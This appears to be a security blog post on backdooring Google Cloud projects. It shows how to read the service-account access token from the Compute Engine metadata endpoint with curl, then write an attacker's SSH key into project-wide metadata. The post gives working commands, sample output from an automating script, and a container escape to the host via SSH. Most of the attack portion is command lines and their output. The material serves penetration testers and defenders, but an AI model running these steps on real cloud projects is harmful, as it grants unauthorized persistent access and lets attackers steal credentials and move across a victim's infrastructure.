Abusing Cloud APIs to Backdoor GCP Projects

Introduction

GCP, or Google Cloud Platform, is Google’s suite of cloud services. You can use it to run your applications in the cloud with services like Compute Engine, Cloud Functions, Big Query, etc. Google already uses it to power some of their applications like Google Search and Youtube.

In this post I’ll briefly talk about the Cloud API and how certain configurations can allow attackers to pivot around your infrastructure and even maintain persistence. The only disclaimer is that the Compute Engine instance you’re launching your attack from needs to have a service account associated with it (default) and have read/write access to the Compute Engine API. It’s a pretty big ask, I know, but considering one of the two presets for scopes will grant you that permission without warning, it’s not unrealistic. Plus, it could be useful in case you find yourself in an assessment where this is relevant!

Metadata Endpoints

Many cloud providers provide an internal metadata endpoint, typically assigned a non-publicly-routable IP address. Some metadata endpoints are harmless and provide useful information about the environment, others may let you call certain dangerous API functions on behalf of the instance you’re on. Here’s a handy list of different cloud providers and the metadata endpoints they have.

SSRF attacks against metadata endpoints aren’t new. Pocket and Qualified have both seen these attacks (luckily as part of their bug bounties!) with some potentially devastating impact. It’s worth noting that Google’s endpoint requires you to set a Metadata-Flavor: Google header, mitigating the typical SSRF attack scenarios and forcing attackers to use an RCE bug (like in the case of Qualified).

Interacting with the Endpoints

You can pretty much use curl for everything. Reading metadata typically doesn’t require authentication, which can be great if the service you’re dealing with stores sensitive info there.

$ curl -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/project/attributes/
ssh-keys
$ curl -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/project/attributes/ssh-keys
omar:ssh-rsa AAAAB...vZ3E49 omar
omar:ssh-rsa AAAAB...M2oi7N omar
...

Our goal here is to write our public key to that endpoint. That requires authentication, but we can do that. Let’s first get an access token. We can authenticate our requests by attaching the access token to them.

$ curl -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
{"access_token":"ya29.c.......5gNg3","expires_in":3385,"token_type":"Bearer"}

Now we just need to send it our public keys. The annoying thing is that since you’re replacing the contents of this endpoint you’ll need to retrieve a list of the existing public keys, append yours, and then send it over.

$ curl \
-H "Metadata-Flavor: Google" \
-H "Authentication: Bearer ya29.c...." \
-d '{"items": [{"key": "ssh-keys", "value": "public keys"}]})'
https://www.googleapis.com/compute/v1/projects/project-name/setCommonInstanceMetadata

Now that we’ve done that, all the Compute Engine instances as part of this project will have your ssh public key on them. In some cases, you might want to do this for the particular instance you’re on, instead of the entire project. Luckily that’s not too difficult, you just need to change the particular endpoint you’re talking to. I’ll cover that at the end.

Putting it Together

While the set of requests we need to make is easy to follow, it’s still always easier to automate that away. I’ve made a python script that handles that, which you can find here. You just plug in your ssh public key, and it’ll try to add it to the current project - saving time from having to fingerprint your API privileges.

$ python add_key_to_project.py "... ssh public key ..."
Got Access Token: XXX...
Got project name: XXX...
Got instance name: XXX...
================================================================================
13 keys for the project
6 keys for the instance
================================================================================
Success!

Bonus: Container Escape

If you find yourself on a container (eg docker) on a Google Compute Engine instance, you can actually still use the metadata endpoint to escape into the parent host. You don’t even need to change anything in the script. After adding your ssh key you can simply ssh into the parent host with the corresponding private key, and you’re out! You now have access to all the other containers running on that system.

bash-4.4# python add_key_to_project.py "... ssh public key ..."
Got Access Token: XXX...
Got project name: XXX...
Got instance name: XXX...
================================================================================
13 keys for the project
6 keys for the instance
================================================================================
Success!

bash-4.4# ssh -i backdoor.key omar@172.17.0.1
Linux instance-1 4.9.0-4-amd64 #1 SMP Debian 4.9.51-1 (2017-09-28) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.

omar@instance-1:~$ sudo docker ps # parent host!
CONTAINER ID        IMAGE               COMMAND
fc1b2d9a8dd9        bash:4.4            "docker-entrypoint..."